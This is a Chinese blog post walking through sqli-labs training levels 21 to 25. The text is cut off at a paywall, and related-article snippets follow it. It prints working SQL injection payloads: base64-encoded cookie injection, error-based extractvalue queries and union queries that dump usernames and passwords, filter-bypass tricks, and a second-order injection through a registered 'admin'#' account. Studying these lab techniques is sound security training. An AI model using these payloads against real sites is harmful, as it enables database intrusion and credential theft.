sql-labs page2(21~38) 解题过程记录

最新推荐文章于 2023-02-01 10:10:22 发布
最新推荐文章于 2023-02-01 10:10:22 发布
阅读量737 收藏 3
点赞数 1
分类专栏: web安全 CTF题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/98778531
版权

目录

less-21( 基于错误的复杂的字符型Cookie注入)

less -22(基于错误的双引号字符型Cookie注入)

less-23(基于错误的,过滤注释的GET型)

less-24(二次注入)

less-25 (过滤了or和and)

less-25a(过滤了or和and的盲注)

less-26(过滤了注释和空格的注入)

less-26(过滤了空格和注释的盲注)

less-27(过滤了union和select的)

less-27a(过滤union 和select 的双引号型盲注)

less-28(基于错误的,有括号的单引号字符型,过滤了union和select等的注入)

less-28a(基于盲注的,有括号的单引号字符型,过滤了union和select等的注入)

less-29(基于WAF的一个错误)

less-30(Get-Blind Havaing with WAF)

less-31(FUN with  WAF)

less-32(GET-Bypass custom filter adding slashes to dangerous chars(GET-Bypass自定义过滤器为危险的字符添加斜杠)

less-33(GET-Bypass AddSlashes() )

less -34(POST-Bypass AddSlasches() )

less-35(GET-Bypass Add Slashes(we don't need them)Integer based)

less-36(GET-Bypass MYSQL_real_escape_string)

less-37(POST- Bypass MYSQL_real_escape_string)

less-38(Future Editions) 终于是最后一题了卍卍卍卍

less-21( 基于错误的复杂的字符型Cookie注入)

输入admin 和admin :发现cookie 中的uname 经过了加密,瞅一眼是base64 

 

那还和上题一样,只不过需要把 cookie : 的注入信息先经过base64 的加密

还有一点需要注意: 就是cookie的闭合方式:单引号 和 括号的闭合方式


 

Cookie:select 1,2,group_concat(username,0x3a,password) from users #

//密文

Cookie: c2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyAjICAgICAgIA==

less -22(基于错误的双引号字符型Cookie注入)

和less-21 差不多,不同的是$cookee1的闭合方式:这里需要用双引号闭合

// 数据库名

admin" and extractvalue(1,concat(0x7e,(database()))) #


// 表名
admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema = database()))) #

// column_name

admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name = 'users'))) #

//脱库

admin" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password)from users))) #


这里发现输出不完 ,太长了,那换一种写法,一行一行来输出,通过 不断改变 limit 


admin" and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1))) #

密文:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKWZyb20gdXNlcnMgbGltaXQgMSwxKSkpICM=

less-23(基于错误的,过滤注释的GET型)

查看源码:发现注释符被替换为空

这里不能用 order by 来查询有几个字段

原因:

where与order by是子句,and是操作符,用于where子句。
在MySQL的执行顺序中,where是远在order by前面的。

在第一个查询语句中,id='1' and '1'='1'作为where的条件,先被执行,得到结果集;然后是order by,因结果集中无第四个字段所以报错。

在第二个查询语句中,order by在where的条件中,在where执行时被忽略了,结果集生成后并未再执行order by

这里可以用union来查询 字段:
 

//报错
?id=1' union select 1,2,3,4 or '1'='1
// 正常
?id=1' union select 1,2,3 or '1'='1

爆库payload

?id=' union select 1,2,database() '


爆表payload

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '


爆列名payload

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '


爆值payload

?id=-1' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

这里ID = -1 不用多说了吧,使左边查询为空,腾出回显位

当输入:

?id=' union select 5,4,3 or '1'='1

时:

这个 1 是从哪里来的呢?  其实是select 中有3块,3_column 和后面的 or ‘1’ and ‘1’ 组成的条件恒为真 所以为 1

这说明了这里的回显位为后两个,2_column 和 3_column ,所以我们在注入的时候要保证 3_column 的条件恒为 假,才能输出信息

less-24(二次注入)

我们先注册一个新账户:  admin'#   和     123456 进入后的界面

然后我们修改密码:

把密码修改为 123123

此时我们修改的是  admin 的密码 而不是 admin'#  账户的密码

可以试一试:

修改完成后就可以 用  admin 和 123123 登录

用 admin'#   和 123456 还是可以登录   用admin'#  和 123123 不能登录

 注入成功

或者我们 用 admin 加  4个空格   注册用户名   也是可以的

或者运用信息截断也可以   比如 数据中的uname 字段的类型为 varcher(10)(这里我们不知道长度是多少假设是10),那么我们可以注册 “admin+5个空格+a“ 

这时超出长度的字符串被截断 在数据库中只会存入  admin +5个空格

less-25 (过滤了or和and)

输入 : ?id=1 提示说过滤了 and 和 or

最低0.47元/天 解锁文章
Captain Hammer
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQli-labs 进阶 21-38
感恩
09-15 331
SQLI-LAB less21~38
sqli-labs(Page 2)
Lorezon的博客
04-12 246
Less-21
sqli-labs靶场第二十二关
gou1791241251的博客
12-31 447
第二十二关cookie编码注入! 当我使用")编码后放入cookie中去请求发现报错了!说明很可能是")闭合的 没注入成功,试一下 " , ’ , ‘)这几种情况吧 或不输入单引号和双引号把爱 " and extractvalue(1,concat(’^’,(select database()),’^’)) --+ 注入失败 " and extractvalue(1,concat(’^’,(select database()),’^’)) # 注入成功 这里发现一个问题,在cookie注入时,使用–
学习用博客做学习笔记
yhimi7的博客
02-01 281
自从去年在网易公开课上看了几节python编程的视频课之后,一发不可收拾,把平时消遣娱乐看电视的时间都来看编程视频了,看完之后很快就忘记了一些知识,于是写了点笔记,但发现查阅不是很方便,看很多大佬都在用博客写心得,随时随地可以查到自己以前记录的点滴知识,看来我也得学学用博客来做笔记了,就从这里开始吧!一、我是干嘛的?我是一个药剂师,以前学的都是与医药有关,在医疗系统工作的小小药师。以上只是今天学习时发的一点感慨,以后把每天的学习笔记记录到博客上来,有空也会把前阵子的笔记补上来。
sql注入练习--dorabox(整型、字符型、搜索型)
qq_42420978的博客
02-03 429
1、整型 (1)在搜索栏输入:id = 0(SELECT * FROM news WHERE id = 1) (2)判断数据库的字段数 0 order by1(2/3)(SELECT * FROM news WHERE id = 0 order by 3) (3)判断网页上有输出的位置(2/3) 0 union select1,2,3(SELECT * FROM news WHERE id ...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 2122关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs攻关5(Sta)(Less-39~Less-53)
qwzf
11-17 524
前言 闲来无事,继续打sqlilabs,并总结相关知识。 一、堆叠注入(Less-39~Less-45) Stacked injection:堆叠注入(堆查询注入) 堆叠注入的原理 在SQL中,分号;是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 而union injection(联合注入)也是将两条语句...
sql-labs11-20关
jinhezhai的博客
01-13 662
11-20关都为post传递,这里我们可以用burrp_suit来进行抓包和改包,也可以用hackbar来进行注入。 ##11关单引号闭合的联合注入 1.先使用1' or 1=1#来找到他的闭合方式。 登录成功单引号闭合。 2.-1' order by 3# 找有多少个字段。 报错,换成2不报错说明有两个字段。 3.你就可以愉快的使用联合注入了!我只把语句写一下,具体详情请见我另一篇博客。 (...
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
南邮ctf平台部分题解
热门推荐
xuqi7
06-11 2万+
南邮ctf平台部分wp
union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单...
weixin_30568591的博客
05-07 581
这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下。 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/83869918” 再附上一张文章里面的图 接下来直接上题 1.这个看起来有点简单 题目连接:http://ctf5.shiyanbar.com/8/inde...
sql注入,union联合查询
l2086949553的博客
01-07 1807
一、DVWA Security 1、low级别 (1)判断列数: (2)判断显示位 (3)查看当前数据库名:1' union select database(),2 --...
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 8901
sql注入中的union联合查询,union select 1,2,3
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9606
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8236
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
sql-labs安装
08-28
2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值